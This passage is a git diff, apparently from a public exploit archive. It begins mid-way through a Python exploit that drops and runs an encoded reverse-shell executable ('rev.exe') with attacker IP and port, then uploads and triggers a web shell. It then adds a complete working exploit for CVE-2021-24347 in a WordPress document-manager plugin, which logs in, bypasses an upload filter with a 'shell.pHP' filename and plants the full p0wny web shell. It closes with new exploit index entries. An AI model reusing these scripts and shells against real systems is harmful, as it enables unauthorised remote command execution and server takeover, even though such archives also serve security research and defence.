QcYB5gm2KyxVHaI8DYCMi7Yyxi7NBQoYbzpVNoC87VkFDfaVHMDQYOEjSKL2BmKhG1/LHnxYCSEc06Um6OdpR6YZXcrhCzNt/O8QhgnTpRpVW78NVf1erdoBnNLmSh8RzdaOITCsu/p7fusfAjXE/dPkH4ppr2ALXgLPEER7G2OwW6Z9OZ1N24MNQhe1Vj0xmIY+MYx6rLYR1BG010DtIJjzC+bWIA+FU3QTtTvRle4hhLsPBGByJjRrAPVTPWEPH0y/MkC8YqIXNy2e1FgGMGMzuVYlHT92GhoAIwDoCdYmOEDPBw2FnoAJ3euzGO01InJYhPqH0HJEE9yte5EY8fRMAnJ45sUESifocFozaHmMHM5FAf0ZKTqi1cYQpH7mVUFM/DYwLhG5b9h9Ar16GihfI3DLT4qJj5kBkwzHZ4iG+rVoUqKX6auNa2O2YeKQ20JDCFuzDVjZpP5VO6QZ9ItFEMucDQ2ghgNMf1Nkgm224TYiMJv+469Iu2UkpZGCljZxAC2qdoI39ncSYeIA/y//C6S0HQBE7X/EvkBjzZ+wSjQu+RNWj8bG9v++bjOK30O1H9XnqGJvAwD99pu5eW8t+631fGsjQ2PXh/J8vD1CeDxApspOU8LoMU4KJMZ581H0jRsdHPmWAfAUQhFPkqoUKvO4ABAuhmeeT1yRSClWqQBgg+T10QzFYPRo91vMlUoVab9FYUqxGP3m0FzJ6+TXiQBfokhF//zoHVuRlimG0dozN+f/O7/5vwA=\";\r\n$evalCode = gzinflate(base64_decode($payload));\r\n$evalArguments = \" \".$port.\" \".$ip;\r\n$tmpdir =\"C:\\\\windows\\\\temp\";\r\nchdir($tmpdir);\r\n$res .= \"Using dir : \".$tmpdir;\r\n$filename = \"rev.exe\";\r\n$file = fopen($filename, 'wb');\r\nfwrite($file, $evalCode);\r\nfclose($file);\r\n$path = $filename;\r\n$cmd = $path.$evalArguments;\r\n$res .= \"\\n\\nExecuting : \".$cmd.\"\\n\";\r\necho $res;\r\n$output = system($cmd);\r\n\t\t\t\r\n?>\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY--\r\n"
+
+print("\033[1;33;40m Uploading shell...")
+out = requests.post(req_url, headers=req_headers, data=req_data, verify=False)
+
+print("\033[1;31;40m Uploaded shell will be available at "+shellpath+"")
+print(" Enjoy!")
+
+# finding the uploaded shell
+session = HTMLSession()
+r = session.get(shellpath)
+sel = 'a[href*="'+shellfilename+'"]'
+find_shellfilename = r.html.find(sel)
+
+# popping up the shell :p
+for shellname in find_shellfilename:
+    try:
+        url = shellname.absolute_links.pop()
+        print("\033[1;33;40m Shell is available at "+url+"")
+        response = urllib.request.urlopen(url)
+        print(" Byeee!")
+    except KeyboardInterrupt:
+        exit('User aborted!')
\ No newline at end of file
diff --git a/exploits/php/webapps/50115.py b/exploits/php/webapps/50115.py
new file mode 100755
index 000000000..8b21a9f32
--- /dev/null
+++ b/exploits/php/webapps/50115.py
@@ -0,0 +1,139 @@
+# Exploit Title: Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)
+# Date 07.07.2021
+# Exploit Author: Ron Jost (Hacker5preme)
+# Vendor Homepage: https://smartypantsplugins.com/
+# Software Link: https://downloads.wordpress.org/plugin/sp-client-document-manager.4.21.zip
+# Version: Before 4.22
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2021-24347
+# CWE: CWE-434
+# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24347/README.md
+
+'''
+Description:
+The SP Project & Document Manager WordPress plugin before 4.22 allows users to upload files, however,
+the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded
+by checking the file extension. It was discovered that php files could still be uploaded by
+changing the file extension's case, for example, from "php" to "pHP".
+'''
+
+
+'''
+Banner:
+'''
+banner = """
+   ______     _______     ____   ___ ____  _      ____  _  _  _____ _  _ _____ 
+ / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ \| || ||___ /| || |___  |
+| |    \ \ / /|  _| _____ __) | | | |__) | |_____ __) | || |_ |_ \| || |_ / / 
+| |___  \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__   _|__) |__   _/ /  
+ \____|  \_/  |_____|   |_____|\___/_____|_|    |_____|  |_||____/   |_|/_/   
+
+                * Wordpress Plugin SP Project & Document Manager < 4.22 - RCE (Authenticated)                                                        
+                * @Hacker5preme
+
+"""
+print(banner)
+
+
+'''
+Import required modules:
+'''
+import requests
+import argparse
+
+
+'''
+User-Input:
+'''
+my_parser = argparse.ArgumentParser(description='Wordpress Plugin SP Project & Document Manager < 4.22 - RCE (Authenticated)')
+my_parser.add_argument('-T', '--IP', type=str)
+my_parser.add_argument('-P', '--PORT', type=str)
+my_parser.add_argument('-U', '--PATH', type=str)
+my_parser.add_argument('-u', '--USERNAME', type=str)
+my_parser.add_argument('-p', '--PASSWORD', type=str)
+args = my_parser.parse_args()
+target_ip = args.IP
+target_port = args.PORT
+wp_path = args.PATH
+username = args.USERNAME
+password = args.PASSWORD
+print('')
+print('[*] Starting Exploit:')
+print('')
+
+'''
+Authentication:
+'''
+session = requests.Session()
+auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
+
+# Header:
+header = {
+    'Host': target_ip,
+    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
+    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+    'Accept-Encoding': 'gzip, deflate',
+    'Content-Type': 'application/x-www-form-urlencoded',
+    'Origin': 'http://' + target_ip,
+    'Connection': 'close',
+    'Upgrade-Insecure-Requests': '1'
+}
+
+# Body:
+body = {
+    'log': username,
+    'pwd': password,
+    'wp-submit': 'Log In',
+    'testcookie': '1'
+}
+
+# Authenticate:
+print('')
+auth = session.post(auth_url, headers=header, data=body)
+auth_header = auth.headers['Set-Cookie']
+if 'wordpress_logged_in' in auth_header:
+    print('[+] Authentication successfull !')
+else:
+    print('[-] Authentication failed !')
+    exit()
+
+
+'''
+Retrieve User ID from the widget:
+'''
+user_id_text = session.get('http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=sp-client-document-manager-fileview').text
+search_string = "<form><select name='user_uid' id='user_uid' class=''>"
+user_string = ">" + username
+user_id_text = user_id_text[user_id_text.find(search_string):]
+user_id_text = user_id_text[user_id_text.find(user_string) - 2: user_id_text.find(user_string)]
+user_id = user_id_text.replace("'", '')
+
+
+'''
+Exploit:
+'''
+exploit_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=sp-client-document-manager-fileview&id=' + user_id
+
+# Header (Exploit):
+Header = {
+    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0",
+    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
+    "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
+    "Accept-Encoding": "gzip, deflate",
+    "Referer": exploit_url,
+    "Content-Type": "multipart/form-data; boundary=---------------------------37032792112149247252673711332",
+    "Origin": "http://" + target_ip,
+    "Connection": "close",
+    "Upgrade-Insecure-Requests": "1"
+}
+
+# Web Shell payload (p0wny shell): https://github.com/flozz/p0wny-shell
+shell_payload = "-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"cdm_upload_file_field\"\r\n\r\na1b3bac1bc\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"_wp_http_referer\"\r\n\r\n/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-name\"\r\n\r\nExploits\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"shell.pHP\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n    $stdout = array();\n\n    if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n        // pass\n    } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n        chdir($cwd);\n        preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n        chdir($match[1]);\n    } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n        chdir($cwd);\n        preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n        return featureDownload($match[1]);\n    } else {\n        chdir($cwd);\n        exec($cmd, $stdout);\n    }\n\n    return array(\n        \"stdout\" => $stdout,\n        \"cwd\" => getcwd()\n    );\n}\n\nfunction featurePwd() {\n    return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n    chdir($cwd);\n    if ($type == 'cmd') {\n        $cmd = \"compgen -c $fileName\";\n    } else {\n        $cmd = \"compgen -f $fileName\";\n    }\n    $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n    $files = explode(\"\\n\", shell_exec($cmd));\n    return array(\n        'files' => $files,\n    );\n}\n\nfunction featureDownload($filePath) {\n    $file = @file_get_contents($filePath);\n    if ($file === FALSE) {\n        return array(\n            'stdout' => array('File not found / no read permission.'),\n            'cwd' => getcwd()\n        );\n    } else {\n        return array(\n            'name' => basename($filePath),\n            'file' => base64_encode($file)\n        );\n    }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n    chdir($cwd);\n    $f = @fopen($path, 'wb');\n    if ($f === FALSE) {\n        return array(\n            'stdout' => array('Invalid path / no write permission.'),\n            'cwd' => getcwd()\n        );\n    } else {\n        fwrite($f, base64_decode($file));\n        fclose($f);\n        return array(\n            'stdout' => array('Done.'),\n            'cwd' => getcwd()\n        );\n    }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n    $response = NULL;\n\n    switch ($_GET[\"feature\"]) {\n        case \"shell\":\n            $cmd = $_POST['cmd'];\n            if (!preg_match('/2>/', $cmd)) {\n                $cmd .= ' 2>&1';\n            }\n            $response = featureShell($cmd, $_POST[\"cwd\"]);\n            break;\n        case \"pwd\":\n            $response = featurePwd();\n            break;\n        case \"hint\":\n            $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n            break;\n        case 'upload':\n            $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n    }\n\n    header(\"Content-Type: application/json\");\n    echo json_encode($response);\n    die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n    <head>\n        <meta charset=\"UTF-8\" />\n        <title>p0wny@shell:~#</title>\n        <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n        <style>\n            html, body {\n                margin: 0;\n                padding: 0;\n                background: #333;\n                color: #eee;\n                font-family: monospace;\n            }\n\n            *::-webkit-scrollbar-track {\n                border-radius: 8px;\n                background-color: #353535;\n            }\n\n            *::-webkit-scrollbar {\n                width: 8px;\n                height: 8px;\n            }\n\n            *::-webkit-scrollbar-thumb {\n                border-radius: 8px;\n                -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n                background-color: #bcbcbc;\n            }\n\n            #shell {\n                background: #222;\n                max-width: 800px;\n                margin: 50px auto 0 auto;\n                box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n                font-size: 10pt;\n                display: flex;\n                flex-direction: column;\n                align-items: stretch;\n            }\n\n            #shell-content {\n                height: 500px;\n                overflow: auto;\n                padding: 5px;\n                white-space: pre-wrap;\n                flex-grow: 1;\n            }\n\n            #shell-logo {\n                font-weight: bold;\n                color: #FF4180;\n                text-align: center;\n            }\n\n            @media (max-width: 991px) {\n                #shell-logo {\n                    font-size: 6px;\n                    margin: -25px 0;\n                }\n\n                html, body, #shell {\n                    height: 100%;\n                    width: 100%;\n                    max-width: none;\n                }\n\n                #shell {\n                    margin-top: 0;\n                }\n            }\n\n            @media (max-width: 767px) {\n                #shell-input {\n                    flex-direction: column;\n                }\n            }\n\n            @media (max-width: 320px) {\n                #shell-logo {\n                    font-size: 5px;\n                }\n            }\n\n            .shell-prompt {\n                font-weight: bold;\n                color: #75DF0B;\n            }\n\n            .shell-prompt > span {\n                color: #1BC9E7;\n            }\n\n            #shell-input {\n                display: flex;\n                box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n                border-top: rgba(255, 255, 255, .05) solid 1px;\n            }\n\n            #shell-input > label {\n                flex-grow: 0;\n                display: block;\n                padding: 0 5px;\n                height: 30px;\n                line-height: 30px;\n            }\n\n            #shell-input #shell-cmd {\n                height: 30px;\n                line-height: 30px;\n                border: none;\n                background: transparent;\n                color: #eee;\n                font-family: monospace;\n                font-size: 10pt;\n                width: 100%;\n                align-self: center;\n            }\n\n            #shell-input div {\n                flex-grow: 1;\n                align-items: stretch;\n            }\n\n            #shell-input input {\n                outline: none;\n            }\n        </style>\n\n        <script>\n            var CWD = null;\n            var commandHistory = [];\n            var historyPosition = 0;\n            var eShellCmdInput = null;\n            var eShellContent = null;\n\n            function _insertCommand(command) {\n                eShellContent.innerHTML += \"\\n\\n\";\n                eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n                eShellContent.innerHTML += escapeHtml(command);\n                eShellContent.innerHTML += \"\\n\";\n                eShellContent.scrollTop = eShellContent.scrollHeight;\n            }\n\n            function _insertStdout(stdout) {\n                eShellContent.innerHTML += escapeHtml(stdout);\n                eShellContent.scrollTop = eShellContent.scrollHeight;\n            }\n\n            function _defer(callback) {\n                setTimeout(callback, 0);\n            }\n\n            function featureShell(command) {\n\n                _insertCommand(command);\n                if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n                    featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n                } else if (/^\\s*clear\\s*$/.test(command)) {\n                    // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n                    eShellContent.innerHTML = '';\n                } else {\n                    makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n                        if (response.hasOwnProperty('file')) {\n                            featureDownload(response.name, response.file)\n                        } else {\n                            _insertStdout(response.stdout.join(\"\\n\"));\n                            updateCwd(response.cwd);\n                        }\n                    });\n                }\n            }\n\n            function featureHint() {\n                if (eShellCmdInput.value.trim().length === 0) return;  // field is empty -> nothing to complete\n\n                function _requestCallback(data) {\n                    if (data.files.length <= 1) return;  // no completion\n\n                    if (data.files.length === 2) {\n                        if (type === 'cmd') {\n                            eShellCmdInput.value = data.files[0];\n                        } else {\n                            var currentValue = eShellCmdInput.value;\n                            eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n                        }\n                    } else {\n                        _insertCommand(eShellCmdInput.value);\n                        _insertStdout(data.files.join(\"\\n\"));\n                    }\n                }\n\n                var currentCmd = eShellCmdInput.value.split(\" \");\n                var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n                var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n                makeRequest(\n                    \"?feature=hint\",\n                    {\n                        filename: fileName,\n                        cwd: CWD,\n                        type: type\n                    },\n                    _requestCallback\n                );\n\n            }\n\n            function featureDownload(name, file) {\n                var element = document.createElement('a');\n                element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n                element.setAttribute('download', name);\n                element.style.display = 'none';\n                document.body.appendChild(element);\n                element.click();\n                document.body.removeChild(element);\n                _insertStdout('Done.');\n            }\n\n            function featureUpload(path) {\n                var element = document.createElement('input');\n                element.setAttribute('type', 'file');\n                element.style.display = 'none';\n                document.body.appendChild(element);\n                element.addEventListener('change', function () {\n                    var promise = getBase64(element.files[0]);\n                    promise.then(function (file) {\n                        makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n                            _insertStdout(response.stdout.join(\"\\n\"));\n                            updateCwd(response.cwd);\n                        });\n                    }, function () {\n                        _insertStdout('An unknown client-side error occurred.');\n                    });\n                });\n                element.click();\n                document.body.removeChild(element);\n            }\n\n            function getBase64(file, onLoadCallback) {\n                return new Promise(function(resolve, reject) {\n                    var reader = new FileReader();\n                    reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n                    reader.onerror = reject;\n                    reader.readAsDataURL(file);\n                });\n            }\n\n            function genPrompt(cwd) {\n                cwd = cwd || \"~\";\n                var shortCwd = cwd;\n                if (cwd.split(\"/\").length > 3) {\n                    var splittedCwd = cwd.split(\"/\");\n                    shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n                }\n                return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n            }\n\n            function updateCwd(cwd) {\n                if (cwd) {\n                    CWD = cwd;\n                    _updatePrompt();\n                    return;\n                }\n                makeRequest(\"?feature=pwd\", {}, function(response) {\n                    CWD = response.cwd;\n                    _updatePrompt();\n                });\n\n            }\n\n            function escapeHtml(string) {\n                return string\n                    .replace(/&/g, \"&\")\n                    .replace(/</g, \"<\")\n                    .replace(/>/g, \">\");\n            }\n\n            function _updatePrompt() {\n                var eShellPrompt = document.getElementById(\"shell-prompt\");\n                eShellPrompt.innerHTML = genPrompt(CWD);\n            }\n\n            function _onShellCmdKeyDown(event) {\n                switch (event.key) {\n                    case \"Enter\":\n                        featureShell(eShellCmdInput.value);\n                        insertToHistory(eShellCmdInput.value);\n                        eShellCmdInput.value = \"\";\n                        break;\n                    case \"ArrowUp\":\n                        if (historyPosition > 0) {\n                            historyPosition--;\n                            eShellCmdInput.blur();\n                            eShellCmdInput.value = commandHistory[historyPosition];\n                            _defer(function() {\n                                eShellCmdInput.focus();\n                            });\n                        }\n                        break;\n                    case \"ArrowDown\":\n                        if (historyPosition >= commandHistory.length) {\n                            break;\n                        }\n                        historyPosition++;\n                        if (historyPosition === commandHistory.length) {\n                            eShellCmdInput.value = \"\";\n                        } else {\n                            eShellCmdInput.blur();\n                            eShellCmdInput.focus();\n                            eShellCmdInput.value = commandHistory[historyPosition];\n                        }\n                        break;\n                    case 'Tab':\n                        event.preventDefault();\n                        featureHint();\n                        break;\n                }\n            }\n\n            function insertToHistory(cmd) {\n                commandHistory.push(cmd);\n                historyPosition = commandHistory.length;\n            }\n\n            function makeRequest(url, params, callback) {\n                function getQueryString() {\n                    var a = [];\n                    for (var key in params) {\n                        if (params.hasOwnProperty(key)) {\n                            a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n                        }\n                    }\n                    return a.join(\"&\");\n                }\n                var xhr = new XMLHttpRequest();\n                xhr.open(\"POST\", url, true);\n                xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n                xhr.onreadystatechange = function() {\n                    if (xhr.readyState === 4 && xhr.status === 200) {\n                        try {\n                            var responseJson = JSON.parse(xhr.responseText);\n                            callback(responseJson);\n                        } catch (error) {\n                            alert(\"Error while parsing response: \" + error);\n                        }\n                    }\n                };\n                xhr.send(getQueryString());\n            }\n\n            document.onclick = function(event) {\n                event = event || window.event;\n                var selection = window.getSelection();\n                var target = event.target || event.srcElement;\n\n                if (target.tagName === \"SELECT\") {\n                    return;\n                }\n\n                if (!selection.toString()) {\n                    eShellCmdInput.focus();\n                }\n            };\n\n            window.onload = function() {\n                eShellCmdInput = document.getElementById(\"shell-cmd\");\n                eShellContent = document.getElementById(\"shell-content\");\n                updateCwd();\n                eShellCmdInput.focus();\n            };\n        </script>\n    </head>\n\n    <body>\n        <div id=\"shell\">\n            <pre id=\"shell-content\">\n                <div id=\"shell-logo\">\n        ___                         ____      _          _ _        _  _   <span></span>\n _ __  / _ \\__      ___ __  _   _  / __ \\ ___| |__   ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_  ..  _|<span></span>\n| |_) | |_| |\\ V  V /| | | | |_| | | (_| \\__ \\ | | |  __/ | |_   |_      _|<span></span>\n| .__/ \\___/  \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_)    |_||_|  <span></span>\n|_|                         |___/  \\____/                                  <span></span>\n                </div>\n            </pre>\n            <div id=\"shell-input\">\n                <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n                <div>\n                    <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n                </div>\n            </div>\n        </div>\n    </body>\n\n</html>\n\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-notes\"\r\n\r\n\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"sp-cdm-community-upload\"\r\n\r\nUpload\r\n-----------------------------37032792112149247252673711332--\r\n"
+
+# Exploit:
+session.post(exploit_url, headers=header, data=shell_payload)
+print('')
+print('[+] Exploit done !')
+print(' -> Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/sp-client-document-manager/' + user_id + '/shell.php')
+print('')
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 9a73e9d3f..efcf9f0c4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44248,3 +44248,8 @@ id,file,description,date,author,type,platform,port
 50106,exploits/php/webapps/50106.txt,"Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution",2021-07-06,faisalfs10x,webapps,php,
 50109,exploits/php/webapps/50109.txt,"Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection",2021-07-07,faisalfs10x,webapps,php,
 50110,exploits/php/webapps/50110.py,"WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)",2021-07-07,"Beren Kuday GÖRÜN",webapps,php,
+50111,exploits/php/webapps/50111.py,"Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)",2021-07-08,"Davide \'yth1n\' Bianchin",webapps,php,
+50112,exploits/php/webapps/50112.txt,"Employee Record Management System 1.2 - Stored Cross-Site Scripting (XSS)",2021-07-08,"Subhadip Nag",webapps,php,
+50113,exploits/multiple/webapps/50113.txt,"Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE)",2021-07-08,"Patrik Lantz",webapps,multiple,
+50114,exploits/php/webapps/50114.py,"Online Covid Vaccination Scheduler System 1.0 - Arbitrary File Upload to Remote Code Execution (Unauthenticated)",2021-07-08,faisalfs10x,webapps,php,
+50115,exploits/php/webapps/50115.py,"Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)",2021-07-08,"Ron Jost",webapps,php,